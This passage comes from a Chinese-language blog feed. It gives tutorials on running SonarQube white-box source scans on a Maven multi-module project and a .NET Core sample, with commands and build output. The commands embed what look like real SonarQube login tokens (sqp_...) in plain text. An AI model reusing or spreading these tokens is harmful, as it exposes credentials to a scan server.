<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRGtXpR48QJwRZ6-kFdKrGBreJnscnT1mkaBIGWMsnsbKVIvqB3mijkRjlGYfZbFufC85y0V4IjztZ9H8GrK84emSP-ZYRXAkWGkhDbhR_b0b4IO7p-FZijSFZDJb0BFuWS-y9ODDQ3OmARpB3x6lBxVVmiHui05mXf9AGyggoXwvsf3T-2HcZcGp8SXha/s1096/sonar-command.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="1096" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRGtXpR48QJwRZ6-kFdKrGBreJnscnT1mkaBIGWMsnsbKVIvqB3mijkRjlGYfZbFufC85y0V4IjztZ9H8GrK84emSP-ZYRXAkWGkhDbhR_b0b4IO7p-FZijSFZDJb0BFuWS-y9ODDQ3OmARpB3x6lBxVVmiHui05mXf9AGyggoXwvsf3T-2HcZcGp8SXha/w400-h138/sonar-command.png" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(五)若想靈活切換SDK版本,可以在開啟命令提示字元後,依續執行:<br /></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span><span style="color: white;">C:\></span><span style="color: #e69138;">set JAVA_HOME=c:\java\jdk-11.0.2</span><br />
<span style="color: white;">C:\></span><span style="color: #e69138;">set path=%JAVA_HOME%\bin;%PATH%</span><span style="color: #e69138;"> </span><span style="color: #04ff00;">#加在前面,確保被優先引用</span><br />
<span style="color: white;">C:\></span><span style="color: #e69138;">cd c:\sonar-scanning-examples-master\sonarqube-scanner-msbuild</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild></span></span><span style="color: #e69138;">mvn clean verify sonar:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03</span><br /><br /><span style="color: #04ff00;"> 或者</span><br /><span style="color: white;"><br />C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild></span><span style="color: #e69138;">mvn clean verify <span style="background-color: #caff33;">org.sonarsource.scanner.maven:sonar-maven-plugin:3.9.1.2184</span>:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03
</span></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(六)執行過程如下所示(<span style="color: #e69138;"><b>橘紅色部分是我所執行的命令</b></span>)</p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\></span><span style="color: #e69138;">java -version</span><br /><span style="color: white;">openjdk version "11.0.2" 2019-01-15</span><br /><span style="color: white;">
OpenJDK Runtime Environment 18.9 (build 11.0.2+9)</span><br /><span style="color: white;">
OpenJDK 64-Bit Server VM 18.9 (build 11.0.2+9, mixed mode)<br /></span><br /><span style="color: white;">
C:\></span><span style="color: #e69138;">cd sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule></span><span style="color: #e69138;">mvn clean verify org.sonarsource.scanner.maven:sonar-maven-plugin:3.9.1.2184:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Scanning for projects...</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Reactor Build Order:</span><br />
<span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Example of multi-module Maven project [pom]</span><br />
<span style="color: white;">[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 1 [jar]</span><br />
<span style="color: white;">[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 2 [jar]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Tests [jar]</span><br />
<span><br /><b><span style="color: #ff00fe;"><<部分訊息省略>></span></b></span><br /><span style="color: white;"><br />[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ANALYSIS SUCCESSFUL, you can find the results at: http://192.168.232.129:9000/dashboard?id=Examp-Maven-A</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Note that you will be able to access the updated dashboard once the server has processed the submitted analysis report</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] More about the report processing at http://192.168.232.129:9000/api/ce/task?id=AYrZSjAxVbRR_GlSxZsf</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Analysis total time: 7.571 s</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Reactor Summary for Example of multi-module Maven project 1.0-SNAPSHOT:</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Example of multi-module Maven project .............. SUCCESS [ 9.495 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 1 ........................................... </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 6.353 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 2 ........................................... </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 1.566 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Tests .............................................. </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 1.851 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] </span><span style="color: #04ff00;">BUILD SUCCESS</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Total time: 23.218 s</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Finished at: 2023-09-28T08:57:11+08:00</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule></span></div>
<hr style="border: 2px solid rgb(14, 230, 34);" />
<p style="margin-bottom: 8px; text-indent: 2em;">如果前面各步驟無誤,應該可以完成掃描,最後會看到「EXECUTION SUCCESS」。如果過程出現錯誤,請仔細研讀訊息,善用Google或ChatGPT找出解答。</p>
<p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH8G09tFcE2Ip7-O9CH0ka8lECr3YmuBhfMI-VkzPL6y6RRnDWrUGTYoWkboFFMfRXuVwupBVNn4WYJGHuwwu5l_cqi95nrAew_ataWShVAiOGwvM0QOSqih5BQTbdwjkMnAUHiRVHAUbLXbu9J8dMfbqa5FeGCwiF0TvL83-EVtekzrdd3r3CV4vb8UH_/s1701/results.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="1701" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH8G09tFcE2Ip7-O9CH0ka8lECr3YmuBhfMI-VkzPL6y6RRnDWrUGTYoWkboFFMfRXuVwupBVNn4WYJGHuwwu5l_cqi95nrAew_ataWShVAiOGwvM0QOSqih5BQTbdwjkMnAUHiRVHAUbLXbu9J8dMfbqa5FeGCwiF0TvL83-EVtekzrdd3r3CV4vb8UH_/w400-h91/results.png" width="400" /></a></div>
<p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p>
<hr style="border: 2px solid rgb(14, 230, 34);" />
<p style="margin-left: 1em;">關於 dotNet Framework 專案的掃描,請參閱:<a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)</a></p>
<p style="margin-left: 1em;">關於 dotNet Core 專案的掃描,請參閱:<a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">以SonarQube掃描dotNet Core專案源碼(白箱掃描)</a></p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-3129380904911740462023-09-26T20:25:00.004+08:002023-09-28T11:03:35.429+08:00以SonarQube掃描dotNet Core專案源碼(白箱掃描)<div style="border: 3px solid rgb(17, 122, 101); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;"><a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" target="_blank">SonarQube</a>是一套白箱掃描工具,本例使用開源免費的Community版<span style="text-indent: 2em;">本,有關安裝方式可參考「<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" target="_blank">在KALI Linux建置黑、白箱掃描系統(Arachni及SonarQube)</a>」</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">本文以GitHub上的dotNet Core範例「<a href="https://github.com/MagicianredLabs/dotnetcore5-example" style="text-indent: -32px;" target="_blank"><span style="text-indent: -2em;">MagicianredLabs</span><span style="text-indent: -2em;">/</span><span style="text-indent: -2em;">dotnetcore5-example</span></a>」做示範說明,若想掃描其他 dotNet Core專案,請依該專案環境、結構酌作調整,尤其工具及SDK的版本。</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>一、必要需求</b></p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><span style="text-indent: -2em;">(一)</span><a href="https://dotnet.microsoft.com/en-us/download/dotnet" style="text-indent: -2em;" target="_blank">dotNet SDK</a></p>
<p style="margin-left: 4em; margin-top: 0px;">可下載安裝版或ZIP檔,本例選用7.0.201的Amd 64之ZIP版,直接解壓縮到自選目錄:C:\dotNet.core\dotnet-x64-7.0.201,並將此路徑加入 <b><span style="color: red;">Path </span></b>環境變數。</p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><span style="text-indent: -2em;">(二)檢查「%</span><span style="text-indent: -2em;">USERPROFILE%\.dotnet\tools」目錄裡是否有「</span><span style="text-indent: -2em;">dotnet-sonarscanner.exe」檔案及「.store」目錄,如果沒有,請執行下列命令,以安裝 dotNet Core 用的sonarscanner </span>全域<span style="text-indent: -2em;">工具:</span></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;"><span style="color: #b45f06;"><span style="text-indent: 0px;">cd C:\dotNet.core\dotnet-x64-7.0.201<br /></span><span style="text-indent: -2em;">dotnet tool install --global dotnet-sonarscanner --version 5.13.1</span></span></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;"><b><span style="color: red;">備註:</span></b>可到<a href="https://www.nuget.org/packages/dotnet-sonarscanner" target="_blank">NUGet</a>查看--version X.X.X可支援的版本</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>二、執行掃描</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)啟動SonarQube Scanner Server,假設位於「 <span style="color: #cc0000;">http://192.168.232.153:9000</span>」</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)以瀏覽器連線SonarQube Scanner Server,並建立掃描專案(如重掃描舊專案,請備妥 Project Token)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. 由Projects頁面選擇「Create Project」->「Manually」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2.社群版只能選擇「Locally」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3.填入「Project display name」(專案名稱)及「Project key」(專案鍵名)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4.產生Project Token(專案身份代號)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5.請記下Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6.選擇要被掃描的專案類型(.NET)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/s630/sonar_net_008.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="630" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/w400-h338/sonar_net_008.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">7.選擇.NET的型態(.NET Core)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ0QHrEffPSE9zV6V6wJhSx5n_Dr5F8zCgB6Nssa69OaQUJgHR-vVhEuefXIVAXI3XzX_demYPlciyoqbAYYKHxXNBf5LwxhfJebb-enkFonv2mEbriWWErDzloUILmKs6wLY4vP3g_hV_9ySv7y1ryOWcivGpQ-D-oM-RQK6H-k8wUiDFA-oorkSzsCP/s1558/sonar_net_core_009.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1204" data-original-width="1558" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ0QHrEffPSE9zV6V6wJhSx5n_Dr5F8zCgB6Nssa69OaQUJgHR-vVhEuefXIVAXI3XzX_demYPlciyoqbAYYKHxXNBf5LwxhfJebb-enkFonv2mEbriWWErDzloUILmKs6wLY4vP3g_hV_9ySv7y1ryOWcivGpQ-D-oM-RQK6H-k8wUiDFA-oorkSzsCP/w400-h309/sonar_net_core_009.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(三)開啟命令提示字元,將工作目錄切換到待掃描的dotNet Core專案目錄,本例使用</span><a href="https://github.com/MagicianredLabs/dotnetcore5-example" target="_blank"><span style="text-indent: -2em;">MagicianredLabs</span><span style="text-indent: -2em;">/</span><span style="text-indent: -2em;">dotnetcore5-example</span></a>裡的it.example.dotnetcore5專案做示範,下載後置於D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5。</p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(四)如果已完成項一之(二)的要求,就不會理會上圖的第一條命令(dotnet tool install --global dotnet-sonarscanner)。<br />如已將dotNet SDK的目錄加到PATH環境變數,就逐一複製及執行SonarQube所提供的後三段命令。<br />若想靈活切換SDK版本,可以在執行掃描命令之前先執行「set PATH=SDKPath;%PATH%」設定路徑(SDKPath請換成dotNet SDK的真正路徑)</span></p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(五)執行過程如下所示(<span style="color: #e69138;"><b>橘紅色部分是我所執行的命令</b></span>)</span></p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;">
<span style="color: white;">C:\></span><span><span style="color: #e69138;">set path=C:\dotNet-x64-7.0.201;%path%</span><br /><span style="color: white;">C:\></span><span style="color: #e69138;">d:</span><br /><span style="color: white;">D:\></span></span><span style="color: #e69138;">cd d:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5</span><br />
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;"><span>dotnet sonarscanner begin /k:".netFram</span><span>ework-Example.core" /d:sonar.host.url="http://192.168.232.153:9000" /d:sonar.login="sqp_c855f5d97c43571f467c8757cd5bcd1e9bb8792a"</span></span><br />
<span style="color: white;">SonarScanner for MSBuild 5.13.1</span><br />
<span style="color: white;">Using the .NET Core version of the Scanner for MSBuild</span><br />
<span style="color: white;">Pre-processing started.</span><br />
<span style="color: white;">Preparing working directories...</span><br />
<span style="color: #ff00fe;"><b><<部分訊息省略>></b></span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;">dotnet build</span><br />
<span style="color: white;">MSBuild version 17.5.0-preview-23061-01+040e2a90e for .NET</span><br />
<span style="color: white;"> 正在判斷要還原的專案...</span><br />
<span style="color: white;"><<部分訊息省略>></span><br />
<span style="color: white;"> Sonar: (it.example.dotnetcore5.webapi.tests.integration.csproj) Project processed successfully</span><br />
<span style="color: white;"><br /></span><br />
<span style="color: #04ff00;">建置成功。</span><br />
<span style="color: white;"><br /></span><br />
<span style="color: #fcff01;">C:\dotNet-x64-7.0.201\sdk\7.0.201\Sdks\Microsoft.NET.Sdk\targets\Microsoft.NET.EolTargetFrameworks.targets(28,5): warning NETSDK1138: 目標 Framework 'net5.0' 已不受支援,未來將不會再收到任何安全性更新。如需支援原則的詳細資訊,請參閱 https://aka.ms/dotnet-core-support。 [D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.bl\it.example.dotnetcore5.bl.csproj]</span><br />
<span><b><span style="color: #ff00fe;"><<部分訊息省略>></span></b><br /></span><br />
<span style="color: #fcff01;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.webapi\Program.cs(12,18): warning S1118: Add a 'protected' constructor or the 'static' keyword to the class declaration. [D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.webapi\it.example.dotnetcore5.webapi.csproj]</span><br />
<span style="color: #fcff01;"> 39 個警告</span><br />
<span style="color: white;"> 0 個錯誤</span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">經過時間 00:01:51.00</span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;"><span>dotnet sonarscanner end /d:sonar.login</span><span>="sqp_c855f5d97c43571f467c8757cd5bcd1e9bb8792a"</span></span><br />
<span style="color: white;">SonarScanner for MSBuild 5.13.1</span><br />
<span style="color: white;">Using the .NET Core version of the Scanner for MSBuild</span><br />
<span style="color: white;">Post-processing started.</span><br />
<span style="color: white;">Calling the SonarScanner CLI...</span><br />
<span><span style="color: #ff00fe;"><b><<部分訊息省略>></b></span><br /></span><br />
<span style="color: white;">INFO: More about the report processing at http://192.168.232.153:9000/api/ce/task?id=AYrMzgcpHOOPZyW4SWNL</span><br />
<span style="color: white;">INFO: Analysis total time: 14.247 s</span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">INFO: <span style="background-color: #600685;">EXECUTION SUCCESS</span></span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">INFO: Total time: 17.470s</span><br />
<span style="color: white;">INFO: Final Memory: 17M/60M</span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="background-color: #600685; color: white;">The SonarScanner CLI has finished</span><br />
<span style="color: white;">19:34:12.82 Post-processing succeeded.</span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><br />
</div>
<hr style="border: 2px solid rgb(174, 214, 241);" />
<p style="margin-bottom: 8px; text-indent: 2em;">如果前面各步驟無誤,應該可以完成掃描,最後會看到「<span style="color: #990000;">EXECUTION SUCCESS</span>」。如果過程出現錯誤,請仔細研讀訊息,善用Google或ChatGPT找出解答。</p><p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKXZWG0p6JO9pQYib6ZMz80Xt_FfAh46dyKuTemv9oRqCGATsX1BTEJr_G-HNwW-4TJznnHv5BaV01blmVNtixZgA7toI__xQT3l2DdJ93mMUHIpJ3KIR_umnmV050j1YaSSe4mHxDNJmWTki1HNDxHWSuZ7dnuLu1r0V4Rvbuw9esSAKckVN6PYsb7qk/s1594/011.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="1594" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKXZWG0p6JO9pQYib6ZMz80Xt_FfAh46dyKuTemv9oRqCGATsX1BTEJr_G-HNwW-4TJznnHv5BaV01blmVNtixZgA7toI__xQT3l2DdJ93mMUHIpJ3KIR_umnmV050j1YaSSe4mHxDNJmWTki1HNDxHWSuZ7dnuLu1r0V4Rvbuw9esSAKckVN6PYsb7qk/w640-h162/011.PNG" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<hr style="border: 2px solid rgb(174, 214, 241);" /> 關於 dotNet Framework 專案的掃描,請參閱:<a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)
</a></div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-42745673440909377412023-09-24T16:17:00.005+08:002023-09-26T20:29:32.642+08:00以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)<div style="border: 3px solid rgb(17, 122, 101); line-height: 150%; padding: 8px;">
